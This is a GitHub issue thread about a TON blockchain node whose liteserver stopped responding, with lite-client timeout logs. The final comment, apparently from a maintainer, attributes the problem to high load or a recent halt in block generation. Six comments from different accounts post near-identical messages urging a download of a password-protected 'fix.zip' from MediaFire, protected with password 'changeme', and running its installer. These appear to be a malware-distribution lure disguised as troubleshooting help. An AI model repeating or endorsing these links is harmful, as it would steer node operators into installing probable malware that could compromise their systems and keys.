### ISSUE TITLE
Node suddenly cannot read api

### ISSUE THREAD

**Issue by COLUD4** [ton-blockchain/ton#1131]
Hello! Node suddenly cannot read api. But I didn't do anything with the node.How can I restore the node?
version: https://github.com/ton-blockchain/ton/releases/tag/v2024.08
The node has been synchronized.
log:
/lite-client -a 127.0.0.1:43679 -p ./node/keys/liteserver.pub -v 4
using liteserver [127.0.0.1:43679]
[ 2][t 0][2024-08-28 03:09:19.640421393][terminal.cpp:102][!terminal io]	disabling readline
[ 3][t 1][2024-08-28 03:09:19.640564901][ext-client.cpp:36][!ExtClient]	Started ext client, 1 liteservers
[ 3][t 1][2024-08-28 03:09:19.640611747][ext-client.cpp:126][!ExtClient]	Connecting to liteserver #0 (127.0.0.1:43679) for query [ getVersion (-1,8000000000000000) ]
[ 4][t 1][2024-08-28 03:09:19.640631044][ext-client.cpp:56][!ExtClient]	Sending query [ getVersion (-1,8000000000000000) ] to server #0 (127.0.0.1:43679)
[ 4][t 0][2024-08-28 03:09:19.643115972][BufferedFd.h:216][!outconn]	Flush write: +256B[left:0B]
[ 4][t 0][2024-08-28 03:09:19.643137653][adnl-ext-connection.cpp:31][!outconn]	sending packet of size 52
[ 4][t 0][2024-08-28 03:09:19.643150050][BufferedFd.h:216][!outconn]	Flush write: +120B[left:0B]
[ 4][t 0][2024-08-28 03:09:19.643361528][BufferedFd.h:207][!outconn]	Flush read: +68B[total:68B]
[ 4][t 0][2024-08-28 03:09:19.643367794][adnl-ext-connection.cpp:80][!outconn]	len=64
[ 4][t 0][2024-08-28 03:09:19.643372790][adnl-ext-connection.cpp:163][!outconn]	received packet of size 64
[ 4][t 0][2024-08-28 03:09:29.650379915][adnl-ext-connection.cpp:31][!outconn]	sending packet of size 12
[ 4][t 0][2024-08-28 03:09:29.650432583][BufferedFd.h:216][!outconn]	Flush write: +80B[left:0B]
[ 4][t 0][2024-08-28 03:09:29.650476587][BufferedFd.h:207][!outconn]	Flush read: +80B[total:80B]
[ 4][t 0][2024-08-28 03:09:29.650481564][adnl-ext-connection.cpp:80][!outconn]	len=76
[ 4][t 0][2024-08-28 03:09:29.650486534][adnl-ext-connection.cpp:163][!outconn]	received packet of size 76
[ 1][t 1][2024-08-28 03:09:29.650866116][lite-client.cpp:125][!testnode]	failed query: [Error : 652 : timeout for adnl query query]
[ 1][t 1][2024-08-28 03:09:29.650891322][lite-client.cpp:323][!testnode]	cannot get server version and time (server too old?)
[ 1][t 1][2024-08-28 03:09:29.650896273][lite-client.cpp:335][!testnode]	server version is too old (at least 1.1 with capabilities 1 required), some queries are unavailable

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by EmelyanenkoK** [comment]
This either related to 
1) too high load: node can't synchronize and stops answering queries. If this issue persists - upgrade nodes hardware, recommended specification is on docs.ton.org
2) 2 days ago was prolonged block generation halting. During this period LS consider absence of fresh block as loss of synchronization and stopped answering queries as well. Such haltings are exceptional events and are very rare.
